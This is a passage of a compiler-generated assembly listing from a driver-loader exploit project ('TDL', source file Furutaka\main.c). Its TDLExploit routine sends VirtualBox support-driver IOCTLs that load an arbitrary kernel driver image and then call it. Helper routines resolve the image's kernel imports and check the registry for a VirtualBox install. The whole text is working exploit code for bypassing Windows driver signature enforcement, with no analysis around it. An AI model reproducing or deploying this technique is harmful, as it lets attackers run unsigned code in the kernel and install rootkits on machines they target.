test rcx, rcx je $LN12@TDLExploit ; Line 222 mov eax, DWORD PTR Cookie$[rsp+24] ; Line 235 mov r8, rsi mov DWORD PTR [rcx], eax mov rdx, r15 mov rcx, QWORD PTR pLoadTask$[rsp] mov eax, DWORD PTR Cookie$[rsp+28] mov DWORD PTR [rcx+4], eax lea ecx, DWORD PTR [rsi+104] mov rax, QWORD PTR pLoadTask$[rsp] mov DWORD PTR [rax+8], ecx mov rax, QWORD PTR pLoadTask$[rsp] mov DWORD PTR [rax+12], 24 mov rax, QWORD PTR pLoadTask$[rsp] mov DWORD PTR [rax+16], 1107296322 ; 42000042H mov rax, QWORD PTR pLoadTask$[rsp] mov DWORD PTR [rax+20], r13d mov rax, QWORD PTR pLoadTask$[rsp] mov DWORD PTR [rax+80], ebx mov rax, QWORD PTR pLoadTask$[rsp] mov QWORD PTR [rax+72], r14 mov rax, QWORD PTR pLoadTask$[rsp] mov QWORD PTR [rax+40], 106496 ; 0001a000H mov rax, QWORD PTR pLoadTask$[rsp] mov QWORD PTR [rax+64], r14 mov rax, QWORD PTR pLoadTask$[rsp] mov QWORD PTR [rax+56], r14 mov rax, QWORD PTR pLoadTask$[rsp] mov QWORD PTR [rax+48], r14 mov rcx, QWORD PTR pLoadTask$[rsp] add rcx, 104 ; 00000068H call memcpy ; Line 236 mov rax, QWORD PTR pLoadTask$[rsp] ; Line 238 lea r15d, QWORD PTR [rbx+23] mov QWORD PTR [rsp+56], r13 mov edx, 2261528 ; 00228218H mov DWORD PTR [rax+100], esi lea rax, QWORD PTR bytesIO$[rbp-256] mov r8, QWORD PTR pLoadTask$[rsp] mov rcx, QWORD PTR g_hVBox mov QWORD PTR [rsp+48], rax mov DWORD PTR [rsp+40], r15d mov r9d, DWORD PTR [r8+8] mov QWORD PTR [rsp+32], r8 call QWORD PTR __imp_DeviceIoControl test eax, eax jne SHORT $LN8@TDLExploit ; Line 242 mov edx, ebx lea rcx, OFFSET FLAT:??_C@_1EI@INCHPAGN@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAS?$AAU?$AAP?$AA_?$AAI?$AAO?$AAC?$AAT?$AAL?$AA_@ ; Line 243 jmp $LN23@TDLExploit $LN8@TDLExploit: ; Line 246 lea rdx, OFFSET FLAT:??_C@_1HE@JFOLDMOA@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAS?$AAU?$AAP?$AA_?$AAI?$AAO?$AAC?$AAT?$AAL?$AA_@ lea rcx, QWORD PTR text$[rbp-256] call _strcpy_w ; Line 247 lea rcx, QWORD PTR text$[rbp-256] call _strend_w mov rdx, rax mov rcx, r14 call u64tohex_w ; Line 248 lea rdx, OFFSET FLAT:??_C@_1BI@BLMPOKEB@?$AA?0?$AA?5?$AAs?$AAi?$AAz?$AAe?$AA?5?$AA?$DN?$AA?5?$AA0?$AAx@ lea rcx, QWORD PTR text$[rbp-256] call _strcat_w ; Line 249 lea rcx, QWORD PTR text$[rbp-256] call _strend_w mov rdx, rax mov ecx, esi call ultohex_w ; Line 251 lea rdx, OFFSET FLAT:??_C@_1DK@EPAAGPAO@?$AA?$AN?$AA?6?$AA?7?$AAD?$AAr?$AAi?$AAv?$AAe?$AAr?$AA?5?$AAi?$AAm?$AAa?$AAg?$AAe@ lea rcx, QWORD PTR text$[rbp-256] call _strcat_w ; Line 252 lea rcx, QWORD PTR text$[rbp-256] call _strend_w mov rdx, rax lea rcx, QWORD PTR [r14+r12] call u64tohex_w ; Line 253 mov edx, ebx lea rcx, QWORD PTR text$[rbp-256] call cuiPrintTextW ; File C:\Program Files (x86)\Windows Kits\10\Include\10.0.19041.0\um\winnt.h ; Line 20225 xor eax, eax ; File J:\Workspace\drivers\TDL\Source\Furutaka\main.c ; Line 265 mov QWORD PTR [rsp+56], r13 ; File C:\Program Files (x86)\Windows Kits\10\Include\10.0.19041.0\um\winnt.h ; Line 20225 lea rdi, QWORD PTR vmFast$[rbp-256] ; File J:\Workspace\drivers\TDL\Source\Furutaka\main.c ; Line 265 mov edx, 2261580 ; 0022824cH lea r8, QWORD PTR vmFast$[rbp-256] ; File C:\Program Files (x86)\Windows Kits\10\Include\10.0.19041.0\um\winnt.h ; Line 20225 lea r12d, QWORD PTR [rax+32] mov ecx, r12d ; File J:\Workspace\drivers\TDL\Source\Furutaka\main.c ; Line 265 mov r9d, r12d ; File C:\Program Files (x86)\Windows Kits\10\Include\10.0.19041.0\um\winnt.h ; Line 20225 rep stosb ; File J:\Workspace\drivers\TDL\Source\Furutaka\main.c ; Line 257 mov eax, DWORD PTR Cookie$[rsp+24] ; Line 265 mov rcx, QWORD PTR g_hVBox mov DWORD PTR vmFast$[rbp-256], eax mov eax, DWORD PTR Cookie$[rsp+28] mov DWORD PTR vmFast$[rbp-252], eax lea rax, QWORD PTR bytesIO$[rbp-256] mov QWORD PTR [rsp+48], rax lea rax, QWORD PTR vmFast$[rbp-256] mov DWORD PTR [rsp+40], r15d mov QWORD PTR [rsp+32], rax mov QWORD PTR vmFast$[rbp-240], 1107296322 ; 42000042H mov DWORD PTR vmFast$[rbp-248], r12d mov DWORD PTR vmFast$[rbp-244], r15d mov QWORD PTR vmFast$[rbp-232], 106496 ; 0001a000H call QWORD PTR __imp_DeviceIoControl mov edx, ebx test eax, eax jne SHORT $LN10@TDLExploit ; Line 269 lea rcx, OFFSET FLAT:??_C@_1FG@OEMDNKOC@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAS?$AAU?$AAP?$AA_?$AAI?$AAO?$AAC?$AAT?$AAL?$AA_@ ; Line 270 jmp $LN23@TDLExploit $LN10@TDLExploit: ; Line 273 lea rcx, OFFSET FLAT:??_C@_1FK@MDOKEACB@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAS?$AAU?$AAP?$AA_?$AAI?$AAO?$AAC?$AAT?$AAL?$AA_@ call cuiPrintTextW ; Line 276 mov edx, ebx lea rcx, OFFSET FLAT:??_C@_1DG@HDAIEBIB@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAS?$AAU?$AAP?$AA_?$AAI?$AAO?$AAC?$AAT?$AAL?$AA_@ call cuiPrintTextW ; Line 279 mov rcx, QWORD PTR g_hVBox lea rax, QWORD PTR bytesIO$[rbp-256] mov QWORD PTR [rsp+56], r13 xor r9d, r9d mov QWORD PTR [rsp+48], rax xor r8d, r8d lea rax, QWORD PTR paramOut$[rbp-256] mov DWORD PTR [rsp+40], 8 mov edx, 2261771 ; 0022830bH mov QWORD PTR [rsp+32], rax mov QWORD PTR paramOut$[rbp-256], r13 call QWORD PTR __imp_DeviceIoControl ; Line 283 mov edx, ebx lea rcx, OFFSET FLAT:??_C@_1DA@HAFJFEII@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAS?$AAU?$AAP?$AA_?$AAI?$AAO?$AAC?$AAT?$AAL?$AA_@ call cuiPrintTextW ; File C:\Program Files (x86)\Windows Kits\10\Include\10.0.19041.0\um\winnt.h ; Line 20225 xor eax, eax ; File J:\Workspace\drivers\TDL\Source\Furutaka\main.c ; Line 294 mov QWORD PTR [rsp+56], r13 ; File C:\Program Files (x86)\Windows Kits\10\Include\10.0.19041.0\um\winnt.h ; Line 20225 mov rcx, r12 lea rdi, QWORD PTR ldrFree$[rbp-256] rep stosb ; File J:\Workspace\drivers\TDL\Source\Furutaka\main.c ; Line 286 mov eax, DWORD PTR Cookie$[rsp+24] ; Line 294 lea r8, QWORD PTR ldrFree$[rbp-256] mov rcx, QWORD PTR g_hVBox mov r9d, r12d mov DWORD PTR ldrFree$[rbp-256], eax mov edx, 2261532 ; 0022821cH mov eax, DWORD PTR Cookie$[rsp+28] mov DWORD PTR ldrFree$[rbp-252], eax lea rax, QWORD PTR bytesIO$[rbp-256] mov QWORD PTR [rsp+48], rax lea rax, QWORD PTR ldrFree$[rbp-256] mov DWORD PTR [rsp+40], r15d mov QWORD PTR [rsp+32], rax mov DWORD PTR ldrFree$[rbp-248], r12d mov DWORD PTR ldrFree$[rbp-244], r15d mov QWORD PTR ldrFree$[rbp-240], 1107296322 ; 42000042H mov QWORD PTR ldrFree$[rbp-232], r14 call QWORD PTR __imp_DeviceIoControl $LN3@TDLExploit: ; Line 301 cmp QWORD PTR pLoadTask$[rsp], r13 je SHORT $LN12@TDLExploit ; Line 303 mov r9d, 32768 ; 00008000H mov QWORD PTR memIO$[rsp], r13 lea r8, QWORD PTR memIO$[rsp] or rcx, -1 lea rdx, QWORD PTR pLoadTask$[rsp] call QWORD PTR __imp_NtFreeVirtualMemory $LN12@TDLExploit: ; Line 306 mov rcx, QWORD PTR g_hVBox cmp rcx, -1 je SHORT $LN13@TDLExploit ; Line 307 call QWORD PTR __imp_CloseHandle ; Line 308 or QWORD PTR g_hVBox, -1 $LN13@TDLExploit: ; Line 310 lea r11, QWORD PTR [rsp+784] mov rbx, QWORD PTR [r11+48] mov rsi, QWORD PTR [r11+56] mov rdi, QWORD PTR [r11+64] mov rsp, r11 pop r15 pop r14 pop r13 pop r12 pop rbp ret 0 TDLExploit ENDP _TEXT ENDS ; Function compile flags: /Ogspy ; COMDAT TDLResolveKernelImport _TEXT SEGMENT Image$ = 80 KernelImage$ = 88 KernelBase$ = 96 TDLResolveKernelImport PROC ; COMDAT ; File J:\Workspace\drivers\TDL\Source\Furutaka\main.c ; Line 111 $LN19: mov QWORD PTR [rsp+8], rbx mov QWORD PTR [rsp+16], rbp mov QWORD PTR [rsp+24], rsi push rdi push r12 push r13 push r14 push r15 sub rsp, 32 ; 00000020H mov r12, r8 mov r13, rdx mov rbx, rcx ; Line 119 call QWORD PTR __imp_RtlImageNtHeader ; Line 121 cmp DWORD PTR [rax+132], 1 jbe SHORT $LN3@TDLResolve ; Line 124 mov edi, DWORD PTR [rax+144] ; Line 125 test rdi, rdi je SHORT $LN3@TDLResolve ; Line 130 mov eax, DWORD PTR [rdi+rbx] test eax, eax jne SHORT $LN8@TDLResolve ; Line 131 mov eax, DWORD PTR [rdi+rbx+16] $LN8@TDLResolve: ; Line 135 mov esi, eax add rsi, rbx xor ebp, ebp jmp SHORT $LN17@TDLResolve $LL4@TDLResolve: ; Line 136 mov r15d, DWORD PTR [rdi+rbx+16] ; Line 137 add r15, rbx test rcx, rcx js SHORT $LN9@TDLResolve ; Line 139 lea r8, QWORD PTR [rbx+2] add r8, rcx ; Line 140 jmp SHORT $LN2@TDLResolve $LN9@TDLResolve: ; Line 142 movzx r8d, cx $LN2@TDLResolve: ; Line 135 mov rdx, r13 mov rcx, r12 call TDLGetProcAddress mov QWORD PTR [r15+rbp*8], rax inc ebp add rsi, 8 $LN17@TDLResolve: mov rcx, QWORD PTR [rsi] test rcx, rcx jne SHORT $LL4@TDLResolve $LN3@TDLResolve: ; Line 144 mov rbx, QWORD PTR [rsp+80] mov rbp, QWORD PTR [rsp+88] mov rsi, QWORD PTR [rsp+96] add rsp, 32 ; 00000020H pop r15 pop r14 pop r13 pop r12 pop rdi ret 0 TDLResolveKernelImport ENDP _TEXT ENDS ; Function compile flags: /Ogspy ; COMDAT TDLGetProcAddress _TEXT SEGMENT cStr$ = 32 KernelBase$ = 64 KernelImage$ = 72 FunctionName$ = 80 pfn$ = 88 TDLGetProcAddress PROC ; COMDAT ; File J:\Workspace\drivers\TDL\Source\Furutaka\main.c ; Line 87 $LN5: mov QWORD PTR [rsp+8], rbx push rdi sub rsp, 48 ; 00000030H ; Line 89 and QWORD PTR pfn$[rsp], 0 mov rbx, rdx mov rdi, rcx ; Line 91 mov rdx, r8 lea rcx, QWORD PTR cStr$[rsp] call QWORD PTR __imp_RtlInitString ; Line 92 lea r9, QWORD PTR pfn$[rsp] xor r8d, r8d lea rdx, QWORD PTR cStr$[rsp] mov rcx, rbx call QWORD PTR __imp_LdrGetProcedureAddress test eax, eax jns SHORT $LN2@TDLGetProc ; Line 93 xor eax, eax jmp SHORT $LN1@TDLGetProc $LN2@TDLGetProc: ; Line 95 mov rax, QWORD PTR pfn$[rsp] sub rax, rbx add rax, rdi $LN1@TDLGetProc: ; Line 96 mov rbx, QWORD PTR [rsp+64] add rsp, 48 ; 00000030H pop rdi ret 0 TDLGetProcAddress ENDP _TEXT ENDS ; Function compile flags: /Ogspy ; COMDAT TDLVBoxInstalled _TEXT SEGMENT hKey$ = 64 TDLVBoxInstalled PROC ; COMDAT ; File J:\Workspace\drivers\TDL\Source\Furutaka\main.c ; Line 57 $LN5: push rbx sub rsp, 48 ; 00000030H ; Line 60 and QWORD PTR hKey$[rsp], 0 ; Line 62 lea rax, QWORD PTR hKey$[rsp] mov r9d, 131097 ; 00020019H mov QWORD PTR [rsp+32], rax xor r8d, r8d lea rdx, OFFSET FLAT:??_C@_1DG@IHFEMIJJ@?$AAS?$AAo?$AAf?$AAt?$AAw?$AAa?$AAr?$AAe?$AA?2?$AAO?$AAr?$AAa?$AAc?$AAl?$AAe@ mov rcx, -2147483646 ; ffffffff80000002H call QWORD PTR __imp_RegOpenKeyExW ; Line 65 mov rcx, QWORD PTR hKey$[rsp] xor ebx, ebx test rcx, rcx setne bl ; Line 67 test rcx, rcx je SHORT $LN2@TDLVBoxIns ; Line 68 call QWORD PTR __imp_RegCloseKey $LN2@TDLVBoxIns: ; Line 71 mov eax, ebx ; Line 72 add rsp, 48 ; 00000030H pop rbx ret 0 TDLVBoxInstalled ENDP _TEXT ENDS END